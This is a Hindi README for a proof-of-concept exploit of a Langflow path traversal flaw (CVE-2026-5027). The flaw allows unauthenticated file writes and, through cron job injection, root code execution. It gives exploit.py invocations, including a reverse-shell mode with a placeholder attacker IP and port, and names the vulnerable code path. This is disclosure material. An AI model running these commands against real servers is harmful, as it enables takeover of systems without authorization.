
CVE-2026-5027 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow में एक पाथ ट्रैवर्सल भेद्यता है, जो क्रॉन जॉब इंजेक्शन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन की ओर ले जाती है।
Langflow के 1.8.4 तक के संस्करण POST /api/v2/files एंडपॉइंट में filename पैरामीटर को सैनिटाइज़ नहीं करते हैं। एक हमलावर पाथ ट्रैवर्सल सीक्वेंस (../) का उपयोग करके फाइलों को फाइलसिस्टम पर मनमाने स्थानों पर लिख सकता है। जब Langflow की डिफ़ॉल्ट ऑटो-लॉगिन कॉन्फ़िगरेशन के साथ जोड़ा जाता है, तो यह बिना किसी प्रमाणीकरण के शोषण योग्य होता है, जिससे क्रॉन जॉब इंजेक्शन के माध्यम से रूट के रूप में रिमोट कोड एक्ज़ीक्यूशन होता है।
# प्रूफ ऑफ कॉन्सेप्ट (टेस्ट फाइल /tmp/ में लिखता है)
python3 exploit.py -t http://target:7860
# क्रेडेंशियल्स के साथ (यदि ऑटो-लॉगिन अक्षम है)
python3 exploit.py -t http://target:7860 -u admin -p password
# क्रॉन जॉब के माध्यम से रिवर्स शेल
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444


src/backend/base/langflow/api/v2/files.py में upload_user_file() फ़ंक्शन file.filename को बिना सैनिटाइज़ेशन के सीधे स्टोरेज सेवा में पास करता है। LocalStorageService.save_file() folder_path / file_name का उपयोग करके पाथ बनाता है, जो डायरेक्टरी ट्रैवर्सल को नहीं रोकता है।
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
Yahia Hamza - https://yh.do